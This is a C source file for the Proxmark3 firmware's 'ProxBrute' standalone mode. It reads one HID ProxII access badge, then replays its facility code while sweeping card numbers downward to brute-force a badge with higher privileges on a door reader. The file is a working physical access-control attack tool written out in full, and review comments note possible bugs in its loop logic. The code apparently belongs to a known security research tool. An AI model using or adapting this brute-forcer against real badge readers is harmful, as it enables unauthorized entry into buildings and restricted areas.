1 //-----------------------------------------------------------------------------
2 // Copyright (C) Brad Antoniewicz 2011
3 // Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
4 //
5 // This program is free software: you can redistribute it and/or modify
6 // it under the terms of the GNU General Public License as published by
7 // the Free Software Foundation, either version 3 of the License, or
8 // (at your option) any later version.
9 //
10 // This program is distributed in the hope that it will be useful,
11 // but WITHOUT ANY WARRANTY; without even the implied warranty of
12 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 // GNU General Public License for more details.
15 // See LICENSE.txt for the text of the license.
16 //-----------------------------------------------------------------------------
17 // main code for LF aka Proxbrute by Brad antoniewicz
18 //-----------------------------------------------------------------------------
19 #include "standalone.h" // standalone definitions
20 #include "proxmark3_arm.h"
21 #include "appmain.h"
22 #include "fpgaloader.h"
23 #include "util.h"
24 #include "dbprint.h"
25 #include "ticks.h"
26 #include "lfops.h"
// Identifies this standalone mode in the firmware's mode listing.
void ModInfo(void) {
    static const char mode_name[] =
        " LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)";
    DbpString(mode_name);
}
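// Standalone entry point: LF HID ProxII "ProxBrute" (Brad Antoniewicz).
//
// Button-driven two-state loop:
//   STATE_READ  - on a button hold, record one HID ProxII tag (facility code
//                 in `high`, card number in `low`) with lf_hid_watch(); an
//                 all-zero read blinks and goes back to waiting.
//   STATE_BRUTE - on a button hold, replay the recorded facility code while
//                 counting the card number down from (low - 1) to 1 through
//                 CmdHIDsimTAGEx().
// Any pending USB command (data_available()) ends the mode and hands the
// shell back. Watchdog is kicked once per outer iteration.
void RunMod(void) {
    StandAloneMode();
    Dbprintf(">> LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<");
    FpgaDownloadAndGo(FPGA_BITSTREAM_LF);

    // Recorded tag halves. Zero-initialised so the all-zero check below is
    // well defined even if lf_hid_watch() returns without writing them.
    uint32_t high = 0;
    uint32_t low = 0;

    // Function-local enum instead of #define: same values, no macro leakage.
    enum {
        STATE_READ = 0,
        STATE_BRUTE = 1
    };
    uint8_t state = STATE_READ;

    for (;;) {
        WDT_HIT();

        // A USB command from the client ends the standalone mode.
        if (data_available()) break;

        // Only a button hold (>= 280 ms) advances the state machine;
        // clicks and no-ops just loop.
        int button_pressed = BUTTON_HELD(280);
        if (button_pressed != BUTTON_HOLD) {
            continue;
        }

        if (state == STATE_READ) {
            LEDsoff();
            LED_A_ON();
            WAIT_BUTTON_RELEASED();
            DbpString("[=] starting recording");

            // findone = 1: return after the first decoded tag.
            lf_hid_watch(1, &high, &low, true);
            Dbprintf("[=] recorded | %x%08x", high, low);

            // Nothing decoded: blink and go back to waiting for a hold.
            if (high == 0 && low == 0) {
                SpinErr(LED_A, 100, 12);
                DbpString("[=] only got zeros, retry recording after click");
                continue;
            }

            SpinErr(LED_A, 250, 2);
            state = STATE_BRUTE;
            continue;
        }

        if (state == STATE_BRUTE) {
            LED_C_ON(); // Simulate
            WAIT_BUTTON_RELEASED();

            /*
              ProxBrute - brad a. - foundstone

              Following code is a trivial brute forcer once you read a valid tag
              the idea is you get a valid tag, then just try and brute force to
              another priv level. The problem is that it has no idea if the code
              worked or not, so its a crap shoot. One option is to time how long
              it takes to get a valid ID then start from scratch every time.
            */
            DbpString("[=] entering ProxBrute mode");
            Dbprintf("[=] simulating | %08x%08x", high, low);

            // Sweep the card number downwards, keeping the facility code.
            // The 16-bit loop variable truncates `low` to its low half. A
            // recorded low == 0 with high != 0 passes the zero check above,
            // so (low - 1) wraps and the sweep starts at 0xFFFF.
            for (uint16_t i = low - 1; i > 0; i--) {
                if (data_available()) break;

                // NOTE(review): WAIT_BUTTON_RELEASED() runs just before this
                // loop, so unless BUTTON_HELD() blocks waiting for a press
                // this check ends the sweep on its first pass - confirm
                // whether "hold to keep going" is the intended contract.
                button_pressed = BUTTON_HELD(280);
                if (button_pressed != BUTTON_HOLD) break;

                Dbprintf("[=] trying Facility = %08x ID %08x", high, i);

                // Per the original note: high, i, ledcontrol, timelimit 20000.
                // The meaning of the remaining arguments is not visible here;
                // check CmdHIDsimTAGEx() before changing them.
                CmdHIDsimTAGEx(0, high, i, 0, false, 20000);
                SpinDelay(100);
            }

            // Back to recording; signal end of sweep on A+C.
            state = STATE_READ;
            SpinErr((LED_A | LED_C), 250, 2);
            LEDsoff();
        }
    }

    SpinErr((LED_A | LED_B | LED_C | LED_D), 250, 5);
    DbpString("[=] You can take the shell back :) ...");
    LEDsoff();
}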